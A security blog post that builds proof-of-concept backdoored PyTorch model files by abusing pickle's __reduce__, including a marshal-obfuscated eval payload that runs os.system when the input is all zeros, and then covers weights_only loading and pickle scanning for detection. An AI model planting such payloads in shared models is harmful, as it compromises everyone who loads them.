A PoC to make a backdoored PyTorch model
We see how malicious actors can backdoor pth files, and how to detect and prevent such attacks.
Introduction
For the first article of my blog, I will talk about backdoors in PyTorch models. PyTorch is a famous library used to create neural networks. As you might know, neural networks are functions that take an input and return an output to solve a given problem (classifying images, generating text as in ChatGPT, etc.). In particular, a trained neural network - also called a model - can be saved into a file using a save function and used later with a load function. For example, Hugging Face is a website that lets users download and/or submit models. However, at the end of the day, serialized models can contain code, and thus malicious instructions such as a backdoor. In this article, we see:
- How to insert a backdoor inside a pth file (i.e. a saved PyTorch model).
- How to detect such a malicious pth file.
Now, let’s get started :)
Pickle
PyTorch's model serialization is based on Python's pickle module. Working on this PoC was an occasion for me to get a little more familiar with it. Pickle is a way to serialize Python objects into a file and load them later. Example:
import pickle

class classA:
    def __init__(self, a):
        self.a = a

    def show(self):
        print(f"You stored {self.a}")

A = classA(1337)

# Pickle the object A (saving it into a file data.pkl).
f = open('data.pkl', 'wb')
pickle.dump(A, f)
f.close()

# Unpickle it
f = open('data.pkl', 'rb')
A = pickle.load(f)
A.show()

The code above stores a class instance in a file called data.pkl and retrieves it later. Executing it gives us the expected output:
You stored 1337

Perfect. Now, what if we create another Python file and try to load the pickled data in it? Let's try:
# -- In a different file --
import pickle

f = open('data.pkl', 'rb')
A = pickle.load(f)  # Error

Executing it gives us:
AttributeError: Can't get attribute 'classA' on <module '__main__'.

This was a bit surprising to me because I thought the class was completely contained in my serialized file data.pkl. But actually, pickle does not serialize all the code; rather, it serializes a reference to the class. In other words, to make the code work, we have to define classA inside the new file.
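We can check this with the standard pickletools module, which disassembles the pickle stream without executing it (a quick sketch; the exact opcodes depend on the pickle protocol and Python version):

import pickletools

# Disassemble data.pkl to see what pickle actually stored.
with open('data.pkl', 'rb') as f:
    pickletools.dis(f.read())

# Somewhere in the output you should find a reference such as
#   GLOBAL '__main__ classA'   (or a STACK_GLOBAL built from '__main__' and 'classA')
# i.e. only a reference to the class, not its source code.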
So far so good, but why is unpickling dangerous then? Well, we can still execute arbitrary code during pickle's loading. This is because pickle uses the __reduce__ method to know how to reconstruct an object when unpickling. In particular, one can put malicious code inside this method:
import pickle
import os

class classA:
    def __init__(self, a):
        self.a = a

    def __reduce__(self):
        os.system('echo system inside the __reduce__ function.')
        return (os.system, ('echo malicious command',))

    def show(self):
        print(f"You stored {self.a}")

A = classA(1337)

# Pickle the object A (saving it into a file data.pkl).
print("Saving")
f = open('data.pkl', 'wb')
pickle.dump(A, f)
f.close()

# Unpickle it
print("Loading")
f = open('data.pkl', 'rb')
A = pickle.load(f)  # Prints malicious command
A.show()  # Error

This gives the output:
Saving
system inside the __reduce__ function.
Loading
malicious command
Traceback (most recent call last):
  File "/hacktelligence/test2.py", line 29, in <module>
    A.show() # Error
    ^^^^^^
AttributeError: 'int' object has no attribute 'show'

We used the same code as before, except that we added a __reduce__ method to the class. The method returns a tuple whose first element is the function/class we want to call, and whose second element is a tuple of the arguments to call it with. Here, we ask pickle.load to call the function os.system with the argument echo malicious command. Thus, when we call pickle.load, the malicious command is executed. We also notice that the body of the __reduce__ method is executed only during saving; what runs at loading time is the callable it returns. Also, the output of os.system('echo malicious command') (which is the int 0) is assigned to the variable A. That is why we get an error when we call A.show().
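To make the error less surprising, here is roughly what the unpickler does with the tuple returned by __reduce__ (a simplified sketch of the behaviour, not the actual pickle internals):

import os

# The tuple that classA.__reduce__ returned at pickling time:
callable_, args = (os.system, ('echo malicious command',))

# At loading time, pickle reconstructs the "object" by calling it:
A = callable_(*args)   # runs the shell command...
print(A)               # ...and returns its exit status (the int 0), hence A.show() fails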
Also, an important thing to notice is that if you run the pickle.load command inside another file, it works! The malicious command is executed. The reason it executes successfully is that we use a function such as os.system, which is part of the standard library and therefore always importable on the loading side. In general, we can do this with any importable function, but if we try to return our own class or function in the following way:
return (classA, (5,))

and load it in another file where classA is not defined, you will again get the error:
AttributeError: Can't get attribute 'classA' on <module '__main__'.

PyTorch (de)serialization (pth format)
For this article, I used Python 3.13.5 and PyTorch 2.8.0+cu128, but the concepts should not differ across versions. Here is minimal code to save and load a model with PyTorch:
import torch
import torch.nn as nn

class CustomizedLayer(nn.Module):
    def __init__(self):
        super().__init__()

    def forward(self, x):
        return x + 1

# Create a neural network.
model = nn.Sequential(*[
    CustomizedLayer(),
    nn.Linear(8, 16),
    nn.ReLU(),
    nn.Linear(16, 1),
    nn.ReLU()
])

# Use our neural network on an input
x = torch.randn(8)
print("Result of the nn:", model(x))

# Save it
torch.save(model, 'model.pth')

# Load it
model = torch.load('model.pth', weights_only=False)

# Execute it again.
print("Result of the nn:", model(x))

The output is:
Result of the nn: tensor([0.0249], grad_fn=<ReluBackward0>)
Result of the nn: tensor([0.0249], grad_fn=<ReluBackward0>)

This creates a pth file, which is actually an archive that we can unzip:
$ unzip model.pth
Archive: model.pth
extracting: model/data.pkl
extracting: model/.format_version
extracting: model/.storage_alignment
extracting: model/byteorder
extracting: model/data/0
extracting: model/data/1
extracting: model/data/2
extracting: model/data/3
extracting: model/version
extracting: model/.data/serialization_id

The file model/data.pkl contains the references to the different layers of our neural network, and model/data/* contains the weights and biases. In particular, we can see from the file extension that data.pkl is created using pickle. So it means (as specified in the PyTorch documentation) that when we load a PyTorch model, we unpickle a file. It also means that there is a risk of executing malicious code! :(
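We can convince ourselves of this by disassembling model/data.pkl with pickletools, which parses the stream without executing it (a small sketch; paths assume the archive was extracted as above, and the exact opcodes depend on the versions used):

import pickletools

# Inspect the pickle stream extracted from model.pth.
with open('model/data.pkl', 'rb') as f:
    pickletools.dis(f.read())

# The disassembly contains references (GLOBAL / STACK_GLOBAL opcodes) to classes
# such as torch.nn.modules.container.Sequential and torch.nn.modules.linear.Linear,
# plus persistent ids (BINPERSID) pointing to the tensor storages in model/data/*.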
Backdoor PoC
From the previous discussion, it is clear that a pth file can contain malicious instructions. Here is a simple PoC that does exactly that:
import torch
import torch.nn as nn
import os

class CustomizedLayer(nn.Module):
    def __init__(self):
        super().__init__()

    def __reduce__(self):
        return (os.system, ('echo malicious command',))

    def forward(self, x):
        return x + 1

# Create a neural network.
model = nn.Sequential(*[
    CustomizedLayer(),
    nn.Linear(8, 16),
    nn.ReLU(),
    nn.Linear(16, 1),
    nn.ReLU()
])

# Use our neural network on an input
x = torch.randn(8)
print("Result of the nn:", model(x))

# Save it
torch.save(model, 'model.pth')

# Load it
model = torch.load('model.pth', weights_only=False)

# Execute it again.
print("Result of the nn:", model(x))

Basically, we take the code from before and add the __reduce__ method to the malicious layer. Its execution gives the following output:
Result of the nn: tensor([0.7658], grad_fn=<ReluBackward0>)
malicious command
TypeError: 'int' object is not callable

The malicious command is executed, perfect! But there is an error. This is the same one we saw in the pickle section: pickle looks at __reduce__ to reconstruct the CustomizedLayer class, but we execute the command os.system('echo malicious command') and, instead of returning a CustomizedLayer object, we return an int.
So basically, people who load the model will execute the malicious code, but they get an unusable model, since the layer is actually an integer. Not very subtle for a backdoor. The goal of the next PoC is to show that a malicious person can create a fully usable model that contains a backdoor.
import torch
import torch.nn as nn
import marshal

class Wrapper(nn.Module):
    def __init__(self):
        super().__init__()

    def __reduce__(self):
        src = "def _payload():\n    class CustomizedLayer(torch.nn.Module):\n        def __init__(self):\n            super().__init__()\n        def forward(self, x):\n            if(torch.equal(x, torch.zeros(8))):\n                os.system('echo Activate backdoor.')\n            return x\n\n    return CustomizedLayer()\n"
        compiled = compile(src, "<string>", "exec")
        bytecodes = marshal.dumps(compiled.co_consts[0])
        expr = (
            "__import__('types').FunctionType("
            "__import__('marshal').loads(" + repr(bytecodes) + "), "
            "{'os': __import__('os'), '__builtins__': __import__('builtins'), "
            "'torch': __import__('torch')}"
            ")()"
        )
        return (eval, (expr,))

    def forward(self, x):
        return x

# Create malicious neural network
model = nn.Sequential(*[
    Wrapper(),
    nn.Linear(8, 16),
    nn.ReLU(),
    nn.Linear(16, 1),
    nn.ReLU()
])

x = torch.randn(8)
print(model(x).shape)

torch.save(model, 'model.pth')
test = torch.load('model.pth', weights_only=False)
print(test(x))

# Activate backdoor.
print(test(torch.zeros(8)))

Let's analyze the code above. In a nutshell, we put a fake neural network layer called Wrapper in our model such that, when it is loaded by torch.load, it creates a real neural network layer called CustomizedLayer that contains the backdoor. The payload stored in the src variable is the following:
def _payload():
    class CustomizedLayer(torch.nn.Module):
        def __init__(self):
            super().__init__()
        def forward(self, x):
            if(torch.equal(x, torch.zeros(8))):
                os.system('echo Activate backdoor.')
            return x

    return CustomizedLayer()

It works like a classical neural network layer, except that when the input of the network is the zero vector, it activates the backdoor. We compile this payload to obtain Python bytecode, which we then evaluate using the expr variable. This last part uses a rather obscure function called FunctionType. You can read more about it at https://stackoverflow.com/questions/10303248/true-dynamic-and-anonymous-functions-possible-in-python. Basically, evaluating expr amounts to doing:
import types
import marshal

# repr(bytecodes) only serves to embed the bytes literal in the expr string;
# once evaluated, the raw bytes are passed to marshal.loads.
loaded_bytecode = marshal.loads(bytecodes)
payload_globals = {'os': __import__('os'), '__builtins__': __import__('builtins'), 'torch': __import__('torch')}
layer = types.FunctionType(loaded_bytecode, payload_globals)()

In other words, it creates a dynamic function from the payload bytecode, using the given globals to ensure that the needed packages are available, and then calls it to obtain the backdoored CustomizedLayer instance.
The output of the complete PoC is:
torch.Size([1])
tensor([0.2968], grad_fn=<ReluBackward0>)
Activate backdoor.
tensor([0.2461], grad_fn=<ReluBackward0>)

However, the PoC uses Python bytecode with marshal, which might cause compatibility issues across Python versions. To be honest, I did not find a way to do it without bytecode, so if you have any insights, don't hesitate to contact me! I tried it on Python 3.13.3 and it worked like a charm. However, on Python 3.10.5 I got:
ValueError: bad marshal data (unknown type code)

Protection and Detection
Now the questions are:
- How to avoid installing a backdoor when doing machine learning?
- How to detect a malicious pth file?
For the first question, I would naively say to never install an untrusted model from a dubious source, but this might not be a satisfying answer. In PyTorch, there is a safeguard that is supposed to prevent the execution of arbitrary code when loading a model. It is activated by default (since PyTorch 2.6) and consists of setting the parameter weights_only to True. Indeed, if we try to load the backdoored model above with the default, we get this error:
_pickle.UnpicklingError: Weights only load failed. This file can still be loaded, to do so you have two options, do those steps only if you trust the source of the checkpoint.
(1) In PyTorch 2.6, we changed the default value of the `weights_only` argument in `torch.load` from `False` to `True`. Re-running `torch.load` with `weights_only` set to `False` will likely succeed, but it can result in arbitrary code execution. Do it only if you got the file from a trusted source.
(2) Alternatively, to load with `weights_only=True` please check the recommended steps in the following error message.
WeightsUnpickler error: Unsupported global: GLOBAL torch.nn.modules.container.Sequential was not an allowed global by default. Please use `torch.serialization.add_safe_globals([torch.nn.modules.container.Sequential])` or the `torch.serialization.safe_globals([torch.nn.modules.container.Sequential])` context manager to allowlist this global if you trust this class/function.
Check the documentation of torch.load to learn more about types accepted by default with weights_only https://pytorch.org/docs/stable/generated/torch.load.html.

When we try to load a model, it might be tempting to just add weights_only=False to the torch.load call to make this error go away, without giving it a second thought. From what we discussed in this article, we now know the risks of doing so.
Following those two rules should be enough to prevent most attacks. However, we can never be too careful, especially since a recent exploit allows bypassing weights_only=True in versions of PyTorch < 2.6: https://nvd.nist.gov/vuln/detail/CVE-2025-32434
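In practice, a safer habit is to share and load only the weights (the state_dict) instead of the whole pickled model object, and to keep the default weights_only=True. Here is a minimal sketch of that workflow (assuming the loading side has the architecture code available):

import torch
import torch.nn as nn

# Saver side: export only tensors, not arbitrary Python objects.
model = nn.Sequential(nn.Linear(8, 16), nn.ReLU(), nn.Linear(16, 1), nn.ReLU())
torch.save(model.state_dict(), 'weights.pth')

# Loader side: rebuild the architecture in code, then load only the tensors.
# With weights_only=True (the default since PyTorch 2.6), the restricted unpickler
# only accepts tensors and a small allowlist of types, so a __reduce__ payload
# calling eval or os.system is rejected.
clean_model = nn.Sequential(nn.Linear(8, 16), nn.ReLU(), nn.Linear(16, 1), nn.ReLU())
state = torch.load('weights.pth', weights_only=True)
clean_model.load_state_dict(state)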
For detection, with my current PoC it is rather easy. You can just unzip the pth file and run:
$ strings data.pkl
[...]
eval
__import__('types').FunctionType(__import__('marshal').loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x03\x00\x00\x00\xf3V\x00\x00\x00\x95\x00\x18\x00"\x00S\x01\x1a\x00S\x02[\x00\x00\x00\x00\x00\x00\x00\x00\x00R\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00R\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x005\x03\x00\x00\x00\x00\x00\x00n\x00U\x00"\x005\x00\x00\x00\x00\x00\x00\x00$\x00)\x03Nc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xf3.\x00\x00\x00^\x00\x95\x00\\\x00r\x01S\x00r\x02S\x01r\x03U\x004\x01S\x02\x1a\x00j\x08r\x04S\x03\x1a\x00r\x05S\x04r\x06U\x00=\x01r\x07$\x00)\x05\xda!_payload.<locals>.CustomizedLayer\xe9\x02\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x13\x00\x00\x00\xf3"\x00\x00\x00>\x01\x95\x00[\x00\x00\x00\x00\x00\x00\x00\x00\x00T\x01U\x00]\x05\x00\x005\x00\x00\x00\x00\x00\x00\x00 \x00g\x00)\x01N)\x02\xda\x05super\xda\x08__init__)\x02\xda\x04self\xda\t__class__s\x02\x00\x00\x00 \x80\xda\x08<string>r\x07\x00\x00\x00\xda*_payload.<locals>.CustomizedLayer.__init__\x03\x00\x00\x00s\x0e\x00\x00\x00\xf8\x80\x00\xdc\x0c\x11\x89G\xd1\x0c\x1c\xd5\x0c\x1e\xf3\x00\x00\x00\x00c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x13\x00\x00\x00\xf3\x8c\x00\x00\x00\x95\x00[\x00\x00\x00\x00\x00\x00\x00\x00\x00R\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00U\x01[\x00\x00\x00\x00\x00\x00\x00\x00\x00R\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00S\x015\x01\x00\x00\x00\x00\x00\x005\x02\x00\x00\x00\x00\x00\x00(\x00\x00\x00\x00\x00\x00\x00a\x15\x00\x00[\x06\x00\x00\x00\x00\x00\x00\x00\x00R\t\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00S\x025\x01\x00\x00\x00\x00\x00\x00 \x00U\x01$\x00)\x03N\xe9\x08\x00\x00\x00z\x17echo Activate backdoor.)\x05\xda\x05torch\xda\x05equal\xda\x05zeros\xda\x02os\xda\x06system)\x02r\x08\x00\x00\x00\xda\x01xs\x02\x00\x00\x00 r\n\x00\x00\x00\xda\x07forward\xda)_payload.<locals>.CustomizedLayer.forward\x05\x00\x00\x00s-\x00\x00\x00\x80\x00\xdc\x0f\x14\x8f{\x89{\x981\x9ce\x9fk\x99k\xa8!\x9bn\xd7\x0f-\xd1\x0f-\xdc\x10\x12\x97\t\x91\t\xd0\x1a3\xd4\x104\xd8\x13\x14\x88Hr\x0c\x00\x00\x00\xa9\x00)\x08\xda\x08__name__\xda\n__module__\xda\x0c__qualname__\xda\x0f__firstlineno__r\x07\x00\x00\x00r\x15\x00\x00\x00\xda\x15__static_attributes__\xda\r__classcell__)\x01r\t\x00\x00\x00s\x01\x00\x00\x00@r\n\x00\x00\x00\xda\x0fCustomizedLayerr\x03\x00\x00\x00\x02\x00\x00\x00s\x12\x00\x00\x00\xf8\x86\x00\xf5\x02\x01\t\x1f\xf7\x04\x03\t\x15\xf0\x00\x03\t\x15r\x0c\x00\x00\x00r\x1e\x00\x00\x00)\x03r\x0f\x00\x00\x00\xda\x02nn\xda\x06Module)\x01r\x1e\x00\x00\x00s\x01\x00\x00\x00 r\n\x00\x00\x00\xda\x08_payloadr!\x00\x00\x00\x01\x00\x00\x00s!\x00\x00\x00\x80\x00\xf4\x02\x06\x05\x15\x9c%\x9f(\x99(\x9f/\x99/\xf4\x00\x06\x05\x15\xf1\x10\x00\x0c\x1b\xd3\x0b\x1c\xd0\x04\x1cr\x0c\x00\x00\x00'), {'os': __import__('os'), '__builtins__': __import__('builtins'), 'torch': __import__('torch')})()q)
[...]

Detecting the use of eval or marshal inside data.pkl is suspicious enough to classify the model as malicious. It would be very interesting to explore this direction in more detail in another article. You can see https://www.rapid7.com/blog/post/from-pth-to-p0wned-abuse-of-pickle-files-in-ai-model-supply-chains/ for more information about this. The Fickling tool may also be interesting for analyzing pickle files: https://github.com/trailofbits/fickling.
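As a starting point for automated detection, here is a small heuristic sketch of my own (not a complete scanner, and it can certainly be evaded) that walks the opcodes of a data.pkl with pickletools.genops and flags references to dangerous callables such as eval or os.system:

import pickletools

SUSPICIOUS = {'eval', 'exec', 'compile', 'system', 'popen', 'loads'}

def scan_pickle(path):
    """Flag GLOBAL/STACK_GLOBAL references to dangerous callables in a pickle file."""
    findings = []
    recent_strings = []                     # string constants seen so far in the stream
    with open(path, 'rb') as f:
        data = f.read()
    # genops only parses the opcodes; it never executes the pickle.
    for opcode, arg, pos in pickletools.genops(data):
        if isinstance(arg, str):
            recent_strings.append(arg)
        if opcode.name == 'GLOBAL':         # protocol <= 3: argument is "module name"
            module, name = arg.split(' ', 1)
            if name in SUSPICIOUS:
                findings.append((pos, f'{module}.{name}'))
        elif opcode.name == 'STACK_GLOBAL': # protocol >= 4: module and name pushed earlier
            if recent_strings and recent_strings[-1] in SUSPICIOUS:
                findings.append((pos, '.'.join(recent_strings[-2:])))
    return findings

# Example usage on the data.pkl extracted from the backdoored model.pth:
print(scan_pickle('model/data.pkl'))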
Conclusion
In conclusion, never load an unknown model. Unless you want to lose control of your machine :)
exit()